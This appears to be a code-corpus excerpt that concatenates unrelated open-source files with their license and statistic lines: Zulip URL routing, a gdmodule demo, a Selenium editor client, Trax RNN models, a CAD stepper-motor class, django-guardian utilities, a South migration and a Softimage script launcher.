    url(r'^config-error/smtp$', TemplateView.as_view(
        template_name='zerver/config_error.html',),
        {'smtp_error': True},),
    url(r'^config-error/ldap$', TemplateView.as_view(
        template_name='zerver/config_error.html',),
        {'ldap_error_realm_is_none': True},
        name='ldap_error_realm_is_none'),
    url(r'^config-error/dev$', TemplateView.as_view(
        template_name='zerver/config_error.html',),
        {'dev_not_supported_error': True},
        name='dev_not_supported'),
]

# Make a copy of i18n_urls so that they appear without prefix for english
urls = list(i18n_urls)

# Include the dual-use patterns twice
urls += [
    url(r'^api/v1/', include(v1_api_and_json_patterns)),
    url(r'^json/', include(v1_api_and_json_patterns)),
]

# user_uploads -> zerver.views.upload.serve_file_backend
#
# This url is an exception to the url naming schemes for endpoints.  It
# supports both API and session cookie authentication, using a single
# URL for both (not 'api/v1/' or 'json/' prefix).  This is required to
# easily support the mobile apps fetching uploaded files without
# having to rewrite URLs, and is implemented using the
# 'override_api_url_scheme' flag passed to rest_dispatch
urls += [
    url(r'^user_uploads/(?P<realm_id_str>(\d*|unk))/(?P<filename>.*)',
        rest_dispatch,
        {'GET': ('zerver.views.upload.serve_file_backend',
                 {'override_api_url_scheme'})}),
    # This endpoint serves thumbnailed versions of images using thumbor;
    # it requires an exception for the same reason.
    url(r'^thumbnail', rest_dispatch,
        {'GET': ('zerver.views.thumbnail.backend_serve_thumbnail',
                 {'override_api_url_scheme'})}),
    # Avatars have the same constraint due to `!avatar` syntax.
    url(r'^avatar/(?P<email_or_id>[\S]+)/(?P<medium>[\S]+)?', rest_dispatch,
        {'GET': ('zerver.views.users.avatar',
                 {'override_api_url_scheme'})}),
    url(r'^avatar/(?P<email_or_id>[\S]+)', rest_dispatch,
        {'GET': ('zerver.views.users.avatar',
                 {'override_api_url_scheme'})}),
]

# This url serves as a way to receive CSP violation reports from the users.
# We use this endpoint to just log these reports.
urls += url(r'^report/csp_violations$', zerver.views.report.report_csp_violations,
            name='zerver.views.report.report_csp_violations'),

# This url serves as a way to provide backward compatibility to messages
# rendered at the time Zulip used camo for doing http -> https conversion for
# such links with images previews. Now thumbor can be used for serving such
# images.
urls += url(r'^external_content/(?P<digest>[\S]+)/(?P<received_url>[\S]+)',
            zerver.views.camo.handle_camo_url,
            name='zerver.views.camo.handle_camo_url'),

# Incoming webhook URLs
# We don't create urls for particular git integrations here
# because of generic one below
for incoming_webhook in WEBHOOK_INTEGRATIONS:
    if incoming_webhook.url_object:
        urls.append(incoming_webhook.url_object)

# Desktop-specific authentication URLs
urls += [
    url(r'^json/fetch_api_key$', rest_dispatch,
        {'POST': 'zerver.views.auth.json_fetch_api_key'}),
]

# Mobile-specific authentication URLs
urls += [
    # This json format view used by the mobile apps lists which
    # authentication backends the server allows as well as details
    # like the requested subdomain's realm icon (if known) and
    # server-specific compatibility.
    url(r'^api/v1/server_settings', zerver.views.auth.api_get_server_settings),
    # This is a deprecated old version of api/v1/server_settings that only returns auth backends.
    url(r'^api/v1/get_auth_backends', zerver.views.auth.api_get_auth_backends,
        name='zerver.views.auth.api_get_auth_backends'),

    # Used as a global check by all mobile clients, which currently send
    # requests to https://zulipchat.com/compatibility almost immediately after
    # starting up.
    url(r'^compatibility$', zerver.views.compatibility.check_global_compatibility),

    # This json format view used by the mobile apps accepts a username/password
    # pair and returns an API key.
    url(r'^api/v1/fetch_api_key$',
        zerver.views.auth.api_fetch_api_key, name='zerver.views.auth.api_fetch_api_key'),

    # This is for the signing in through the devAuthBackEnd on mobile apps.
    url(r'^api/v1/dev_fetch_api_key$',
        zerver.views.auth.api_dev_fetch_api_key,
        name='zerver.views.auth.api_dev_fetch_api_key'),
    # This is for fetching the emails of the admins and the users.
    url(r'^api/v1/dev_list_users$',
        zerver.views.auth.api_dev_list_users,
        name='zerver.views.auth.api_dev_list_users'),

    # Used to present the GOOGLE_CLIENT_ID to mobile apps
    url(r'^api/v1/fetch_google_client_id$',
        zerver.views.auth.api_fetch_google_client_id,
        name='zerver.views.auth.api_fetch_google_client_id'),
]

# View for uploading messages from email mirror
urls += [
    url(r'^email_mirror_message$', zerver.views.email_mirror.email_mirror_message,
        name='zerver.views.email_mirror.email_mirror_message'),
]

# Include URL configuration files for site-specified extra installed
# Django apps
for app_name in settings.EXTRA_INSTALLED_APPS:
    app_dir = os.path.join(settings.DEPLOY_ROOT, app_name)
    if os.path.exists(os.path.join(app_dir, 'urls.py')):
        urls += [url(r'^', include('%s.urls' % (app_name,)))]
        i18n_urls += import_string("{}.urls.i18n_urlpatterns".format(app_name))

# Tornado views
urls += [
    # Used internally for communication between Django and Tornado processes
    url(r'^notify_tornado$', zerver.tornado.views.notify,
        name='zerver.tornado.views.notify'),
    url(r'^api/v1/events/internal$', zerver.tornado.views.get_events_internal),
]

# Python Social Auth
urls += [url(r'^', include('social_django.urls', namespace='social'))]

# User documentation site
urls += [url(r'^help/(?P<article>.*)$',
             MarkdownDirectoryView.as_view(template_name='zerver/documentation_main.html',
                                           path_template='/zerver/help/%s.md'))]
urls += [url(r'^api/(?P<article>[-\w]*\/?)$',
             MarkdownDirectoryView.as_view(template_name='zerver/documentation_main.html',
                                           path_template='/zerver/api/%s.md'))]

# Two Factor urls
if settings.TWO_FACTOR_AUTHENTICATION_ENABLED:
    urls += [url(r'', include(tf_urls)),
             url(r'', include(tf_twilio_urls))]

if settings.DEVELOPMENT:
    urls += dev_urls.urls
    i18n_urls += dev_urls.i18n_urls

# The sequence is important; if i18n urls don't come first then
# reverse url mapping points to i18n urls which causes the frontend
# tests to fail
urlpatterns = i18n_patterns(*i18n_urls) + urls + legacy_urls

def handler400(request: HttpRequest, exception: Exception) -> HttpResponse:
    # (This workaround should become obsolete with Django 2.1; the
    # issue was fixed upstream in commit 7ec0fdf62 on 2018-02-14.)
    #
    # This behaves exactly like the default Django implementation in
    # the case where you haven't made a template "400.html", which we
    # haven't -- except that it doesn't call `@requires_csrf_token` to
    # attempt to set a `csrf_token` variable that the template could
    # use if there were a template.  We skip @requires_csrf_token
    # because that codepath can raise an error on a bad request, which
    # is exactly the case we're trying to handle when we get here.
    # Bug filed upstream: https://code.djangoproject.com/ticket/28693
    #
    # This function is used just because it has this special name in
    # the root urls.py file; for more details, see:
    # https://docs.djangoproject.com/en/1.11/topics/http/views/#customizing-error-views
    return HttpResponseBadRequest(
        '<h1>Bad Request (400)</h1>', content_type='text/html')
apache-2.0
-2,487,553,262,072,114,000
47.75
103
0.668238
false
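An illustrative sketch of the dispatch pattern the file above relies on (simplified assumptions on my part, not zulip's actual implementation): each url() entry pairs a pattern with a {HTTP_METHOD: 'dotted.view.path'} dict, and rest_dispatch resolves the handler by request method, unpacking the optional (view_path, {flags}) tuple form.

from django.http import HttpResponseNotAllowed
from django.utils.module_loading import import_string

def toy_rest_dispatch(request, handlers, **kwargs):
    # Pick the handler entry for this HTTP method, if any.
    entry = handlers.get(request.method)
    if entry is None:
        return HttpResponseNotAllowed(list(handlers))
    if isinstance(entry, tuple):   # (view_path, {flags}) form; flags ignored here
        entry = entry[0]
    view = import_string(entry)    # resolve 'zerver.views...' lazily, like the real dispatcher
    return view(request, **kwargs)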
Solomoriah/gdmodule
demo/gddemo.py
1
1024
#!/usr/bin/env python

import gd, os, cStringIO, urllib2

os.environ["GDFONTPATH"] = "."
FONT = "Pacifico"

def simple():
    im = gd.image((200, 200))
    white = im.colorAllocate((255, 255, 255))
    black = im.colorAllocate((0, 0, 0))
    red = im.colorAllocate((255, 0, 0))
    blue = im.colorAllocate((0, 0, 255))

    im.colorTransparent(white)
    im.interlace(1)

    im.rectangle((0,0),(199,199),black)
    im.arc((100,100),(195,175),0,360,blue)
    im.fill((100,100),red)

    print im.get_bounding_rect(FONT, 12.0, 0.0, (10, 100), "Hello Python")
    im.string_ttf(FONT, 20.0, 0.0, (10, 100), "Hello Python", black)

    f=open("xx.png","w")
    im.writePng(f)
    f.close()

    f=open("xx.jpg", "w")
    im.writeJpeg(f,100)
    f.close()

    f=cStringIO.StringIO()
    im.writePng(f)
    print "PNG size:", len(f.getvalue())
    f.close()

    f = urllib2.urlopen("http://www.gnu.org/graphics/gnu-head-sm.jpg")
    im = gd.image(f, "jpg")
    f.close()
    print "GNU Image Size:", im.size()

simple()
bsd-3-clause
8,312,121,099,719,976,000
20.787234
74
0.583008
false
quentinl-c/network_testing-client
app/editor.py
1
2631
from collaborator import Collaborator
import os
import random
import logging
import time

logging.basicConfig(filename=__name__ + '.log', level=logging.DEBUG)
logger = logging.getLogger(__name__)

HOME_DIR = os.getenv('HOME_DIR', '/home/')

WRITER_SELECTOR = 'ace_text-input'
READER_SELECTOR = 'ace_content'
FILTER = '[Tracker]'

tempo = 15  # Client will wait 15 seconds before getting results


class Editor(Collaborator):
    """docstring for Editor"""

    def __init__(self, controller, target, typing_speed, word_to_type):
        Collaborator.__init__(self, controller, target)
        logger.debug("=== Editor is being instantiated ===")
        self.word_to_type = None
        self.counter = 0

        if len(word_to_type) > 0:
            selector = WRITER_SELECTOR
            self.word_to_type = word_to_type
        else:
            selector = READER_SELECTOR
            self.word_to_type = None

        self.select = None
        while self.select is None:
            self._driver.implicitly_wait(20)
            self.select = self._driver.find_element_by_class_name(
                selector)

    def run(self):
        self.alive = True
        if self.word_to_type is not None:
            beg_time = random.uniform(2.0, 6.0)
            time.sleep(beg_time)
        while self.alive:
            if self.word_to_type is not None:
                w = ''.join((self.word_to_type, ';',
                             str(self.counter).zfill(6)))
                self.select.send_keys(w)
                self.counter += 1
                time.sleep(2)
            else:
                self.select.text
        self.saveTxt()

    def getResults(self):
        time.sleep(tempo)
        logger.debug("=== Get results from log files ===")
        tmp = []
        self.alive = False
        time.sleep(tempo)
        with open(self._log_path, 'r') as content_file:
            for line in content_file:
                beg = line.find(FILTER)
                if beg != -1:
                    rec = line[beg:].split(',')[0].split('"')[0]
                    tmp.append(rec)
        content = '\n'.join(tmp)
        self._controller.sendResults(content)

    def saveTxt(self):
        if self.word_to_type is not None:
            self.select = None
            while self.select is None:
                self._driver.implicitly_wait(20)
                self.select = self._driver.find_element_by_class_name(
                    READER_SELECTOR)
        content = self.select.text
        file = open(HOME_DIR + str(self._controller.id) + '_content.txt', 'w')
        file.write(content)
        file.close()
gpl-3.0
31,586,578,786,040,000
30.698795
78
0.54618
false
google/trax
trax/models/rnn.py
1
9301
# coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# Lint as: python3
"""RNNs (recursive neural networks)."""

from trax import layers as tl
from trax.fastmath import numpy as jnp


def RNNLM(vocab_size,
          d_model=512,
          n_layers=2,
          rnn_cell=tl.LSTMCell,
          rnn_cell_d_state_multiplier=2,
          dropout=0.1,
          mode='train'):
  """Returns an RNN language model.

  This model performs autoregressive language modeling:

    - input: rank 2 tensor representing a batch of text strings via token
      IDs plus padding markers; shape is (batch_size, sequence_length). The
      tensor elements are integers in `range(vocab_size)`, and `0` values
      mark padding positions.

    - output: rank 3 tensor representing a batch of log-probability
      distributions for each sequence position over possible token IDs;
      shape is (batch_size, sequence_length, `vocab_size`).

  Args:
    vocab_size: Input vocabulary size -- each element of the input tensor
        should be an integer in `range(vocab_size)`. These integers typically
        represent token IDs from a vocabulary-based tokenizer.
    d_model: Embedding depth throughout the model.
    n_layers: Number of RNN layers.
    rnn_cell: Type of RNN cell; must be a subclass of `Layer`.
    rnn_cell_d_state_multiplier: Multiplier for feature depth of RNN cell
        state.
    dropout: Stochastic rate (probability) for dropping an activation value
        when applying dropout.
    mode: If `'predict'`, use fast inference; if `'train'` apply dropout.

  Returns:
    An RNN language model as a layer that maps from a tensor of tokens
    to activations over a vocab set.
  """
  if n_layers != 2:
    # TODO(jonni): Remove n_layers arg, if it can't vary?
    raise ValueError(f'Number of layers must be set to 2; instead got'
                     f' {n_layers}.')

  def MultiRNNCell():
    """Multi-layer RNN cell."""
    return tl.Serial(
        tl.Parallel([], tl.Split(n_items=n_layers)),
        tl.SerialWithSideOutputs(
            [rnn_cell(n_units=d_model) for _ in range(n_layers)]),
        tl.Parallel([], tl.Concatenate(n_items=n_layers))
    )

  zero_state = tl.MakeZeroState(  # pylint: disable=no-value-for-parameter
      depth_multiplier=n_layers * rnn_cell_d_state_multiplier
  )

  return tl.Serial(
      tl.ShiftRight(mode=mode),
      tl.Embedding(vocab_size, d_model),
      tl.Dropout(rate=dropout, mode=mode),
      tl.Branch([], zero_state),
      tl.Scan(MultiRNNCell(), axis=1, mode=mode),
      tl.Select([0], n_in=2),  # Drop RNN state.
      tl.Dense(vocab_size),
  )


def GRULM(vocab_size=256,
          d_model=512,
          n_layers=1,
          mode='train'):
  """Returns a GRU (gated recurrent unit) language model.

  This model performs autoregressive language modeling:

    - input: rank 2 tensor representing a batch of text strings via token
      IDs plus padding markers; shape is (batch_size, sequence_length). The
      tensor elements are integers in `range(vocab_size)`, and `0` values
      mark padding positions.

    - output: rank 3 tensor representing a batch of log-probability
      distributions for each sequence position over possible token IDs;
      shape is (batch_size, sequence_length, `vocab_size`).

  Args:
    vocab_size: Input vocabulary size -- each element of the input tensor
        should be an integer in `range(vocab_size)`. These integers typically
        represent token IDs from a vocabulary-based tokenizer.
    d_model: Embedding depth throughout the model.
    n_layers: Number of GRU layers.
    mode: If `'predict'`, use fast inference (and omit the right shift).

  Returns:
    A GRU language model as a layer that maps from a tensor of tokens
    to activations over a vocab set.
  """
  return tl.Serial(
      tl.ShiftRight(mode=mode),
      tl.Embedding(vocab_size, d_model),
      [tl.GRU(d_model, mode=mode) for _ in range(n_layers)],
      tl.Dense(vocab_size),
  )


# TODO(jonni): Decide names (here and Transformer): input/source, output/target
# TODO(jonni): Align with Transformer: (attention-)dropout, n-(attention-)heads
def LSTMSeq2SeqAttn(input_vocab_size=256,
                    target_vocab_size=256,
                    d_model=512,
                    n_encoder_layers=2,
                    n_decoder_layers=2,
                    n_attention_heads=1,
                    attention_dropout=0.0,
                    mode='train'):
  """Returns an LSTM sequence-to-sequence model with attention.

  This model is an encoder-decoder that performs tokenized string-to-string
  ("source"-to-"target") transduction:

    - inputs (2):

        - source: rank 2 tensor representing a batch of text strings via token
          IDs plus padding markers; shape is (batch_size, sequence_length). The
          tensor elements are integers in `range(input_vocab_size)`, and `0`
          values mark padding positions.

        - target: rank 2 tensor representing a batch of text strings via token
          IDs plus padding markers; shape is (batch_size, sequence_length). The
          tensor elements are integers in `range(output_vocab_size)`, and `0`
          values mark padding positions.

    - output: rank 3 tensor representing a batch of log-probability
      distributions for each sequence position over possible token IDs;
      shape is (batch_size, sequence_length, `vocab_size`).

  An example use would be to translate (tokenized) sentences from English to
  German.

  The model works as follows:

  * Input encoder runs on the input tokens and creates activations that
    are used as both keys and values in attention.
  * Pre-attention decoder runs on the targets and creates
    activations that are used as queries in attention.
  * Attention runs on the queries, keys and values masking out input padding.
  * Decoder runs on the result, followed by a cross-entropy loss.

  Args:
    input_vocab_size: Input vocabulary size -- each element of the input
        tensor should be an integer in `range(vocab_size)`. These integers
        typically represent token IDs from a vocabulary-based tokenizer.
    target_vocab_size: Target vocabulary size.
    d_model: Final dimension of tensors at most points in the model, including
        the initial embedding output.
    n_encoder_layers: Number of LSTM layers in the encoder.
    n_decoder_layers: Number of LSTM layers in the decoder after attention.
    n_attention_heads: Number of attention heads.
    attention_dropout: Stochastic rate (probability) for dropping an
        activation value when applying dropout within an attention block.
    mode: If `'predict'`, use fast inference. If `'train'`, each attention block
        will include dropout; else, it will pass all values through unaltered.

  Returns:
    An LSTM sequence-to-sequence model as a layer that maps from a
    source-target tokenized text pair to activations over a vocab set.
  """
  input_encoder = tl.Serial(
      tl.Embedding(input_vocab_size, d_model),
      [tl.LSTM(d_model) for _ in range(n_encoder_layers)],
  )

  pre_attention_decoder = tl.Serial(
      tl.ShiftRight(mode=mode),
      tl.Embedding(target_vocab_size, d_model),
      tl.LSTM(d_model, mode=mode),
  )

  def PrepareAttentionInputs():
    """Layer that prepares queries, keys, values and mask for attention."""
    def F(encoder_activations, decoder_activations, input_tokens):
      keys = values = encoder_activations
      queries = decoder_activations
      # Mask is 1 where inputs are not padding (0) and 0 where they are padding.
      mask = (input_tokens != 0)
      # We need to add axes to the mask for attention heads and decoder length.
      mask = jnp.reshape(mask, (mask.shape[0], 1, 1, mask.shape[1]))
      # Broadcast so mask is [batch, 1 for heads, decoder-len, encoder-len].
      mask = mask + jnp.zeros((1, 1, decoder_activations.shape[1], 1))
      mask = mask.astype(jnp.float32)
      return queries, keys, values, mask
    return tl.Fn('PrepareAttentionInputs', F, n_out=4)

  return tl.Serial(              # in-toks, target-toks
      tl.Select([0, 1, 0, 1]),   # in-toks, target-toks, in-toks, target-toks
      tl.Parallel(input_encoder, pre_attention_decoder),
      PrepareAttentionInputs(),  # q, k, v, mask, target-toks
      tl.Residual(
          tl.AttentionQKV(d_model, n_heads=n_attention_heads,
                          dropout=attention_dropout, mode=mode,
                          cache_KV_in_predict=True)
      ),                         # decoder-vecs, mask, target-toks
      tl.Select([0, 2]),         # decoder-vecs, target-toks
      [tl.LSTM(d_model, mode=mode) for _ in range(n_decoder_layers)],
      tl.Dense(target_vocab_size),
      tl.LogSoftmax()
  )
apache-2.0
-1,051,844,559,480,561,700
39.973568
80
0.669498
false
textcad/pyMagpie
magpie/motor.py
1
2154
#!/usr/bin/env python from textcad import * import magpie.utility import magpie.hardware class Stepper(component.Element): def __init__(self, size="GenericNEMA17", negative=False, negativeLength=10): component.Element.__init__(self, name="stepper") self.size = size self.width = 0 self.length = 0 self.mountSpacing = 0 self.mountScrew = "" self.flangeDiameter = 0 self.flangeHeight = 0 self.shaftLength = 0 self.shaftDiameter = 0 self.negative = negative self.negativeLength = negativeLength magpie.utility.get_dimensions(size=size, name="stepperMotor", obj=self) self.holeLocations = [[self.mountSpacing/2, self.mountSpacing/2, 0], [self.mountSpacing/2, -self.mountSpacing/2, 0], [-self.mountSpacing/2, self.mountSpacing/2, 0], [-self.mountSpacing/2, -self.mountSpacing/2, 0]] self.screw = magpie.hardware.CapScrew(size=self.mountScrew) self.location = [0, 0, 0] self.color = [0.5, 0.5, 0.5] self.construction = self._construction() def _construction(self): body = element.Cube([self.width, self.width, self.length]) body.center = [True, True, False] body.location = [0, 0, -self.length] flange = element.Cylinder(radius=self.flangeDiameter/2, height=self.flangeHeight) shaft = element.Cylinder(radius=self.shaftDiameter/2, height=self.shaftLength+self.flangeHeight) asm = body + flange + shaft if self.negative: # Flange asm += element.Hole(radius=self.flangeDiameter/2, height=self.negativeLength) # Mount holes for hole in self.holeLocations: s = element.Hole(radius=self.screw.outerDiameter/2, height=self.negativeLength) s.location = hole asm += s return asm
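
A hedged usage sketch for the class above; it assumes the "GenericNEMA17" entry (the constructor's default) exists in magpie's stepperMotor dimension table, which the default argument suggests but the file does not show:

# Construct a NEMA17-sized stepper with negatives for mounting.
motor = Stepper(size="GenericNEMA17", negative=True, negativeLength=12)
# get_dimensions() filled in the body/flange/shaft sizes; `construction`
# holds the textcad solid (body + flange + shaft, plus flange and
# mount-hole negatives because negative=True).
print(motor.width, motor.length)
print(motor.holeLocations)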
mit
-7,378,518,400,631,267,000
38.888889
79
0.551532
false
restless/django-guardian
guardian/utils.py
1
4832
""" django-guardian helper functions. Functions defined within this module should be considered as django-guardian's internal functionality. They are **not** guaranteed to be stable - which means they actual input parameters/output type may change in future releases. """ import os import logging from itertools import chain from django.conf import settings from django.contrib.auth import REDIRECT_FIELD_NAME from django.core.exceptions import PermissionDenied from django.http import HttpResponseForbidden, HttpResponseRedirect from django.shortcuts import render_to_response from django.template import RequestContext, TemplateDoesNotExist from django.utils.http import urlquote from guardian.compat import AnonymousUser from guardian.compat import Group from guardian.compat import User from guardian.conf import settings as guardian_settings from guardian.exceptions import NotUserNorGroup logger = logging.getLogger(__name__) abspath = lambda *p: os.path.abspath(os.path.join(*p)) def get_anonymous_user(): """ Returns ``User`` instance (not ``AnonymousUser``) depending on ``ANONYMOUS_USER_ID`` configuration. """ return User.objects.get(id=guardian_settings.ANONYMOUS_USER_ID) def get_groups_backref_name(): """ Returns backreference name from Group to user model. """ return User._meta.get_field_by_name('groups')[0].related_query_name() def get_identity(identity): """ Returns (user_obj, None) or (None, group_obj) tuple depending on what is given. Also accepts AnonymousUser instance but would return ``User`` instead - it is convenient and needed for authorization backend to support anonymous users. :param identity: either ``User`` or ``Group`` instance :raises ``NotUserNorGroup``: if cannot return proper identity instance **Examples**:: >>> user = User.objects.create(username='joe') >>> get_identity(user) (<User: joe>, None) >>> group = Group.objects.create(name='users') >>> get_identity(group) (None, <Group: users>) >>> anon = AnonymousUser() >>> get_identity(anon) (<User: AnonymousUser>, None) >>> get_identity("not instance") ... 
NotUserNorGroup: User/AnonymousUser or Group instance is required (got ) """ if isinstance(identity, AnonymousUser): identity = get_anonymous_user() if isinstance(identity, User): return identity, None elif isinstance(identity, Group): return None, identity raise NotUserNorGroup("User/AnonymousUser or Group instance is required " "(got %s)" % identity) def get_403_or_None(request, perms, obj=None, login_url=None, redirect_field_name=None, return_403=False, accept_global_perms=False): login_url = login_url or settings.LOGIN_URL redirect_field_name = redirect_field_name or REDIRECT_FIELD_NAME # Handles both original and with object provided permission check # as ``obj`` defaults to None has_permissions = False # global perms check first (if accept_global_perms) if accept_global_perms: has_permissions = all(request.user.has_perm(perm) for perm in perms) # if still no permission granted, try obj perms if not has_permissions: has_permissions = all(request.user.has_perm(perm, obj) for perm in perms) if not has_permissions: if return_403: if guardian_settings.RENDER_403: try: response = render_to_response( guardian_settings.TEMPLATE_403, {}, RequestContext(request)) response.status_code = 403 return response except TemplateDoesNotExist, e: if settings.DEBUG: raise e elif guardian_settings.RAISE_403: raise PermissionDenied return HttpResponseForbidden() else: path = urlquote(request.get_full_path()) tup = login_url, redirect_field_name, path return HttpResponseRedirect("%s?%s=%s" % tup) def clean_orphan_obj_perms(): """ Seeks and removes all object permissions entries pointing at non-existing targets. Returns number of removed objects. """ from guardian.models import UserObjectPermission from guardian.models import GroupObjectPermission deleted = 0 # TODO: optimise for perm in chain(UserObjectPermission.objects.all(), GroupObjectPermission.objects.all()): if perm.content_object is None: logger.debug("Removing %s (pk=%d)" % (perm, perm.pk)) perm.delete() deleted += 1 logger.info("Total removed orphan object permissions instances: %d" % deleted) return deleted
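
A hedged sketch of how get_403_or_None is typically wired into a view; `Article` and the 'articles.change_article' permission string are illustrative assumptions, not part of django-guardian:

def edit_article(request, pk):
    article = Article.objects.get(pk=pk)  # Article is a hypothetical model
    # Returns an HTTP response (403 page or login redirect) on failure,
    # or None when all requested permissions are granted.
    forbidden = get_403_or_None(request, perms=['articles.change_article'],
                                obj=article, return_403=True)
    if forbidden is not None:
        return forbidden
    return render_to_response('articles/edit.html', {'article': article},
                              RequestContext(request))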
bsd-2-clause
8,977,540,974,672,123,000
32.324138
81
0.666598
false
hamole/pbl8
pbl8_project/pbl/migrations/0003_auto.py
1
3700
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding M2M table for field studies_for on 'Treatment' m2m_table_name = db.shorten_name(u'pbl_treatment_studies_for') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)), ('study', models.ForeignKey(orm[u'pbl.study'], null=False)) )) db.create_unique(m2m_table_name, ['treatment_id', 'study_id']) # Adding M2M table for field studies_against on 'Treatment' m2m_table_name = db.shorten_name(u'pbl_treatment_studies_against') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)), ('study', models.ForeignKey(orm[u'pbl.study'], null=False)) )) db.create_unique(m2m_table_name, ['treatment_id', 'study_id']) # Removing M2M table for field treatment on 'Study' db.delete_table(db.shorten_name(u'pbl_study_treatment')) def backwards(self, orm): # Removing M2M table for field studies_for on 'Treatment' db.delete_table(db.shorten_name(u'pbl_treatment_studies_for')) # Removing M2M table for field studies_against on 'Treatment' db.delete_table(db.shorten_name(u'pbl_treatment_studies_against')) # Adding M2M table for field treatment on 'Study' m2m_table_name = db.shorten_name(u'pbl_study_treatment') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('study', models.ForeignKey(orm[u'pbl.study'], null=False)), ('treatment', models.ForeignKey(orm[u'pbl.treatment'], null=False)) )) db.create_unique(m2m_table_name, ['study_id', 'treatment_id']) models = { u'pbl.study': { 'Meta': {'ordering': "('title',)", 'object_name': 'Study'}, 'author': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'funder': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'journal': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'year': ('django.db.models.fields.IntegerField', [], {'default': '2014', 'max_length': '4'}) }, u'pbl.treatment': { 'Meta': {'ordering': "('name',)", 'object_name': 'Treatment'}, 'description': ('django.db.models.fields.TextField', [], {}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}), 'studies_against': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'studies_against+'", 'blank': 'True', 'to': u"orm['pbl.Study']"}), 'studies_for': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'studies_for+'", 'blank': 'True', 'to': u"orm['pbl.Study']"}) } } complete_apps = ['pbl']
mit
-9,074,300,691,962,626,000
51.126761
195
0.592703
false
blurstudio/cross3d
cross3d/softimage/external.py
1
4267
## # \namespace cross3d.softimage.external # # \remarks This class can be used even outside of Softimage. It gives you info on where # Softimage is installed, and allows you to run scripts in Softimage. # To access this class use: cross3d.external('softimage') # # \author dougl # \author Blur Studio # \date 01/21/14 # #------------------------------------------------------------------------------------------------------------------------ import os import subprocess import xml.etree.cElementTree as ET from cross3d import Exceptions from cross3d.constants import ScriptLanguage from cross3d.abstract.external import External as AbstractExternal #------------------------------------------------------------------------------------------------------------------------ class External(AbstractExternal): # If the software is installed but not used, don't pick it up when no version is passed in _ignoredVersions = set(os.environ.get('CROSS3D_STUDIO_IGNORED_SOFTIMAGE', '').split(',')) # map years to version numbers _yearForVersion = {'8': '2010', '9': '2011', '10': '2012', '11': '2013', '12': '2014', '13': '2015'} @classmethod def name(cls): return 'Softimage' @classmethod def getFileVersion(cls, filepath): """ Reads the xsi version of an xsi file from the associated scntoc. """ scntoc_path = filepath + 'toc' if os.path.isfile(scntoc_path): tree = ET.parse(scntoc_path) root = tree.getroot() return root.get('xsi_version') return None @classmethod def runScript(cls, script, version=None, architecture=64, language=ScriptLanguage.Python, debug=False, headless=True): if os.path.exists(script): scriptPath = script else: scriptPath = cls.scriptPath() with open(scriptPath, "w") as fle: fle.write(script) binary = os.path.join(cls.binariesPath(version, architecture), 'xsibatch.exe' if headless else 'xsi.exe') scriptArgumentName = '-script' if headless else '-uiscript' # -continue makes sure there are no prompts. command = [binary, '-continue', scriptArgumentName, scriptPath] # -processing means that it will not show the GUI and will not grab a license. if headless: command.insert(1, '-processing') process = subprocess.Popen(command, stdout=subprocess.PIPE) # TODO: This is the way to check for success. But it is blocking. # Writing the log file. with open(cls.scriptLog(), 'w') as fle: fle.write(process.stdout.read()) # Checking the error in the log file. with open(cls.scriptLog()) as fle: content = fle.read() return False if 'FATAL' in content else True @classmethod def binariesPath(cls, version=None, architecture=64, language='English'): """ Finds the install path for various software installations. If version is None, it will return the latest installed version of the software. Raises cross3d.Exceptions.SoftwareNotInstalled if the software is not installed. :param version: The version of the software. Default is None :param architecture: The bit type to query the registry for (32, 64). Default is 64 :param language: Optional language that may be required for specific software packages. 
""" from cross3d.migrate import winregistry hive = 'HKEY_LOCAL_MACHINE' hkey = r'Software\Autodesk\Softimage\InstallPaths' ret = None if version == None: # Find the latest version versions = winregistry.listRegKeyValues(hive, hkey, architecture=architecture) for version in sorted(versions, key= lambda i: i[0], reverse=True): if version[0] not in cls._ignoredVersions: ret = version[1] break else: version = cls._yearForVersion.get(unicode(version), version) try: ret = winregistry.registryValue(hive, hkey, unicode(version), architecture)[0] except WindowsError: raise Exceptions.SoftwareNotInstalled('Softimage', version=version, architecture=architecture, language=language) # If the version is not installed this will return '.', we want to return False. if ret: return os.path.join(os.path.normpath(ret), 'Application', 'bin') raise Exceptions.SoftwareNotInstalled('Softimage', version=version, architecture=architecture, language=language)
mit
-2,558,668,745,692,272,000
36.790909
121
0.669088
false
Geof23/SESABench_II
parboil/driver/benchmark.py
1
19162
